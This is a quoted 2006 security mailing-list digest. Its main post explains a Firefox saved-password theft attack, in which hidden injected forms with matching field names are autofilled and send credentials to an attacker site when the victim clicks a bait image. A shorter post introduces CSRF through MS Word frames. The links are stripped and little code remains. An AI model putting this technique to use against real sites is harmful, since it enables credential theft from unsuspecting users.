Thread-topic: Stealing FF passwords and CSRF with MS Word
> ------------------------------
>
> Message: 2
> Date: Fri, 24 Nov 2006 13:41:55 +0000
> From: pagvac <unknown.pentester@xxxxxxxxx>
> Subject: [Full-disclosure] RCSR fun: stealing FF passwords the easy
> way
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <b7a807650611240541r88576ei28ea6cf19189c23c@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> RCSR (Reverse Cross-Site Request) attacks discovered by Robert Chapin,
> make the theft of passwords in Firefox extremely trivial. I encourage
> you to try the attack as it can be kind of a shocking experience.
>
> Scenario:
>
> 1. User logs into www.target.com through a typical HTML login form
>
> 2. Firefox asks the user if he/she wants to save the password -
> provided that FF never asked the user to save the password for that
> site before ("Remember passwords for sites" under "Options/Security"
> must be *enabled*)
>
> 3. Victim user clicks on "Remember"
>
> 4. Victim user accesses an HTML page on www.target.com containing an
> injected HTML form with the username and password input names *equal*
> to the legitimate login form from step 1
>
> 5. Firefox fills out automatically the form with the original username
> and password values
>
> 6. Victim user clicks on a malicious link
>
> 7. Credentials get sent to evil site!
>
> Now, the form can be completely invisible by adding a bit of HTML to
> the form inputs. I managed to create a form in which all you need is
> trick the victim user to click on an image.
>
>
> Attack walk through:
>
> 1. Enter any fake credentials on
> and click on "Login"
>
> 2. If "Remember passwords for sites" is enabled, FF should prompt you
> to save the password.
>
> 3. Click on "Remember"
>
> 4. Now, in order to illustrate that FF will automatically fill in the
> credentials on any form located on the same site which uses input
> names *equal* the the legitimate form access the following URL:
>
>
>
> If it worked, you should see the username and password field filled in
> automatically by FF. Of course, an evil form like this looks very
> suspicious, but this is just an example to make the point that FF
> trusts and fills in the form simply because it's located on the same
> site and uses input names equal to the legitimate form.
>
> Now, in order to make our evil form more effective we just added the
> following line the in the username and password fields:
>
> style="display: none;"
>
> Finally, we change our submit button for an image that will make a
> good bait. In this case we choose beautiful Scarlett Johansson :-)
>
> If you click on the image, you should see your credentials forwarded
> to Google within the URL:
>
>
>
>
>
> The beauty of this attack is that we don't need JavaScript, it's all
> plain HTML tags. Also, there is *no* patch yet. Apparently this has
> been widely exploited on myspace. I recommend everyone to research
> this attack as it's highly exploitable on sites in which users can
> insert HTML - either though legitimate features (i.e.: posts) or by
> exploiting security bugs such as HTML injection
>
> Notes:
>
> - tested successfully on Mozilla Firefox 2.0
> - JavaScript can also be used to exploit this vulnerability through
> the 'submit()' method (only visiting the evil page is required in this
> case)
>
>
> Check out the following links for more info:
>
>
>
>
>
>
> D=195900085
> (in Spanish)
>
> --
> pagvac
> []
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: FF_remember_passwords.JPG
> Type: image/jpeg
> Size: 8310 bytes
> Desc: not available
> Url :
>
> /20061124/5a18067f/attachment-0001.jpe
>
> ------------------------------
>
> Message: 7
> Date: Fri, 24 Nov 2006 19:12:32 +0000
> From: "David Kierznowski" <david.kierznowski@xxxxxxxxx>
> Subject: [Full-disclosure] CSRF with MS Word
> To: full-disclosure@xxxxxxxxxxxxxxxxx, "Webappsec Mail List"
> <webappsec@xxxxxxxxxxxxxxxxx>,
> security-basics@xxxxxxxxxxxxxxxxx
> Message-ID:
> <f4cd4c010611241112s74dad423o4f00a574c7e0bd67@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> CSRF with MS Word
>
> Our attack vector is found in exploiting MSWord's frame capabilities:
> By creating malicious frames in a document and pointing them to a
> malicious URL, we can exploit multiple, persistent (well almost, this
> is limited) CSRF vulnerabilities (and possibly the browser).
>
> See:
>
>
>
>
>
